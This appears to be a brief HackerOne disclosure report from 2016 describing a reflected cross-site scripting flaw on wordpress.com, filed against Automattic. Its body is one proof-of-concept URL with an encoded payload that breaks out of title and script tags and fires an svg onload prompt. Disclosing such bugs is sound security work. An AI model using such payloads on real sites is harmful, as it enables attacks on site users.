Automattic: XSS on www.wordpress.com

2016-04-23T03:56:17
ID H1:133963
Type hackerone
Reporter spam404
Modified 2016-04-28T06:56:22

Description

Hey,

I found an XSS vulnerability on www.wordpress.com.

Here's a proof-of-concept working in the latest version of Firefox - https://wordpress.com/website/?currency=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28document.domain%29%3E